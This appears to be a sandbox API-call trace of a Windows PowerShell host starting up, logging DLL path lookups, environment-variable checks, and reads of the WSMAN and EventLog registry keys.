	[0773.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0773.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0776.823] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0776.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.823] CoTaskMemFree (pv=0x43e4f0) 
	[0776.825] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0776.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.825] CoTaskMemFree (pv=0x43e4f0) 
	[0776.827] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0776.827] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.827] CoTaskMemFree (pv=0x43e4f0) 
	[0776.828] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0776.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.828] CoTaskMemFree (pv=0x43e4f0) 
	[0776.839] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0776.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.840] CoTaskMemFree (pv=0x43e4f0) 
	[0776.848] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0776.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.848] CoTaskMemFree (pv=0x43e4f0) 
	[0776.849] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0776.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0776.850] CoTaskMemFree (pv=0x43e4f0) 
	[0776.854] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x310) returned 0x0
	[0776.855] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d2dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d2d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d2dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d2d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.855] CoTaskMemFree (pv=0x0) 
	[0776.855] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0776.855] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x484760, lpcchValueName=0x20d388, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x20d388, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0776.856] CoTaskMemFree (pv=0x484760) 
	[0776.856] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0776.856] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x484760, lpcchValueName=0x20d388, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x20d388, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0776.856] CoTaskMemFree (pv=0x484760) 
	[0776.856] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0776.856] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x484760, lpcchValueName=0x20d388, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x20d388, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0776.856] CoTaskMemFree (pv=0x484760) 
	[0776.856] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d36c, lpData=0x0, lpcbData=0x20d368*=0x0 | out: lpType=0x20d36c*=0x1, lpData=0x0, lpcbData=0x20d368*=0x8) returned 0x0
	[0776.856] CoTaskMemAlloc (cb=0xc) returned 0x4f3590
	[0776.856] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d33c, lpData=0x4f3590, lpcbData=0x20d338*=0x8 | out: lpType=0x20d33c*=0x1, lpData="2.0", lpcbData=0x20d338*=0x8) returned 0x0
	[0776.857] CoTaskMemFree (pv=0x4f3590) 
	[0786.610] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d328 | out: phkResult=0x20d328*=0x310) returned 0x0
	[0786.610] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d22c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d228, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d22c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d228*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.610] CoTaskMemFree (pv=0x0) 
	[0786.610] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.611] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x484760, lpcchValueName=0x20d2d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x20d2d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0786.611] CoTaskMemFree (pv=0x484760) 
	[0786.611] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.611] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x484760, lpcchValueName=0x20d2d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x20d2d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0786.611] CoTaskMemFree (pv=0x484760) 
	[0786.611] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.611] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x484760, lpcchValueName=0x20d2d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x20d2d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0786.611] CoTaskMemFree (pv=0x484760) 
	[0786.611] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d2bc, lpData=0x0, lpcbData=0x20d2b8*=0x0 | out: lpType=0x20d2bc*=0x1, lpData=0x0, lpcbData=0x20d2b8*=0x8) returned 0x0
	[0786.611] CoTaskMemAlloc (cb=0xc) returned 0x4f36f0
	[0786.611] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d28c, lpData=0x4f36f0, lpcbData=0x20d288*=0x8 | out: lpType=0x20d28c*=0x1, lpData="2.0", lpcbData=0x20d288*=0x8) returned 0x0
	[0786.611] CoTaskMemFree (pv=0x4f36f0) 
	[0786.613] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0786.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.613] CoTaskMemFree (pv=0x43e4f0) 
	[0786.618] CoTaskMemAlloc (cb=0x104) returned 0x43e4f0
	[0786.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.618] CoTaskMemFree (pv=0x43e4f0) 
	[0786.624] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x2f8) returned 0x0
	[0786.628] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d2cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d2c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d2cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d2c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.628] CoTaskMemFree (pv=0x0) 
	[0786.629] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.629] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x0, lpName=0x484760, lpcchName=0x20d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.629] CoTaskMemFree (pv=0x484760) 
	[0786.629] CoTaskMemFree (pv=0x0) 
	[0786.629] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.629] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x1, lpName=0x484760, lpcchName=0x20d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.629] CoTaskMemFree (pv=0x484760) 
	[0786.629] CoTaskMemFree (pv=0x0) 
	[0786.629] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.629] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x2, lpName=0x484760, lpcchName=0x20d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.630] CoTaskMemFree (pv=0x484760) 
	[0786.630] CoTaskMemFree (pv=0x0) 
	[0786.630] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.630] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x3, lpName=0x484760, lpcchName=0x20d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.630] CoTaskMemFree (pv=0x484760) 
	[0786.630] CoTaskMemFree (pv=0x0) 
	[0786.630] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.630] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x4, lpName=0x484760, lpcchName=0x20d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.630] CoTaskMemFree (pv=0x484760) 
	[0786.630] CoTaskMemFree (pv=0x0) 
	[0786.630] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.630] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x5, lpName=0x484760, lpcchName=0x20d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.630] CoTaskMemFree (pv=0x484760) 
	[0786.630] CoTaskMemFree (pv=0x0) 
	[0786.630] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.631] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x6, lpName=0x484760, lpcchName=0x20d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.631] CoTaskMemFree (pv=0x484760) 
	[0786.631] CoTaskMemFree (pv=0x0) 
	[0786.631] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.631] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x7, lpName=0x484760, lpcchName=0x20d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.631] CoTaskMemFree (pv=0x484760) 
	[0786.631] CoTaskMemFree (pv=0x0) 
	[0786.631] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0786.631] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x8, lpName=0x484760, lpcchName=0x20d358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0786.631] CoTaskMemFree (pv=0x484760) 
	[0786.631] CoTaskMemFree (pv=0x0) 
	[0786.631] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x314) returned 0x0
	[0786.631] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x0) returned 0x2
	[0786.631] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x318) returned 0x0
	[0786.632] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x0) returned 0x2
	[0786.632] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x31c) returned 0x0
	[0786.632] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x0) returned 0x2
	[0786.632] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x320) returned 0x0
	[0786.632] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x0) returned 0x2
	[0786.632] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x324) returned 0x0
	[0786.632] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x0) returned 0x2
	[0786.632] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x328) returned 0x0
	[0786.632] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x0) returned 0x2
	[0786.633] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x32c) returned 0x0
	[0786.633] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x0) returned 0x2
	[0786.633] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x330) returned 0x0
	[0787.666] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x0) returned 0x2
	[0787.666] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x334) returned 0x0
	[0787.666] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3b8 | out: phkResult=0x20d3b8*=0x338) returned 0x0
	[0787.666] RegCloseKey (hKey=0x338) returned 0x0
	[0787.667] RegCloseKey (hKey=0x2f8) returned 0x0
	[0787.668] RegCloseKey (hKey=0x334) returned 0x0
	[0787.676] CoTaskMemAlloc (cb=0x804) returned 0x1b86b480
	[0787.677] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86b480, nSize=0x20d5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5c8) returned 0x1
	[0787.678] CoTaskMemFree (pv=0x1b86b480) 
	[0787.679] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0787.679] GetUserNameW (in: lpBuffer=0x484760, pcbBuffer=0x20d608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d608) returned 1
	[0787.680] CoTaskMemFree (pv=0x484760) 
	[0787.704] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d308 | out: phkResult=0x20d308*=0x33c) returned 0x0
	[0787.704] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d27c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d278, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d27c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d278*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0787.704] CoTaskMemFree (pv=0x0) 
	[0787.704] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0787.704] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0787.704] CoTaskMemFree (pv=0x484760) 
	[0787.704] CoTaskMemFree (pv=0x0) 
	[0787.704] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0787.704] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0787.705] CoTaskMemFree (pv=0x484760) 
	[0787.705] CoTaskMemFree (pv=0x0) 
	[0787.705] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0787.705] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0787.705] CoTaskMemFree (pv=0x484760) 
	[0787.705] CoTaskMemFree (pv=0x0) 
	[0787.705] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0787.705] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0787.705] CoTaskMemFree (pv=0x484760) 
	[0787.705] CoTaskMemFree (pv=0x0) 
	[0787.705] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0787.705] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0787.705] CoTaskMemFree (pv=0x484760) 
	[0787.705] CoTaskMemFree (pv=0x0) 
	[0787.705] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0787.705] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0787.706] CoTaskMemFree (pv=0x484760) 
	[0787.706] CoTaskMemFree (pv=0x0) 
	[0787.706] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0787.706] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0787.706] CoTaskMemFree (pv=0x484760) 
	[0787.706] CoTaskMemFree (pv=0x0) 
	[0787.706] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0787.706] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0787.706] CoTaskMemFree (pv=0x484760) 
	[0787.706] CoTaskMemFree (pv=0x0) 
	[0787.706] CoTaskMemAlloc (cb=0x204) returned 0x484760
	[0787.706] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x484760, lpcchName=0x20d308, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d308, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0787.706] CoTaskMemFree (pv=0x484760) 
	[0787.706] CoTaskMemFree (pv=0x0) 
	[0787.707] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x340) returned 0x0
	[0787.707] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0787.707] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x344) returned 0x0
	[0787.707] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0787.707] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x348) returned 0x0
	[0787.707] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0787.708] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x34c) returned 0x0
	[0787.708] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0787.708] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x350) returned 0x0
	[0787.708] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0787.708] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x354) returned 0x0
	[0787.708] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0787.708] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x358) returned 0x0
	[0787.709] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0787.709] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x35c) returned 0x0
	[0787.709] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x0) returned 0x2
	[0787.709] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x360) returned 0x0
	[0788.770] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d368 | out: phkResult=0x20d368*=0x364) returned 0x0
	[0788.771] RegCloseKey (hKey=0x364) returned 0x0
	[0788.771] RegCloseKey (hKey=0x33c) returned 0x0
	[0788.771] RegCloseKey (hKey=0x360) returned 0x0
	[0788.772] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d308 | out: phkResult=0x20d308*=0x360) returned 0x0
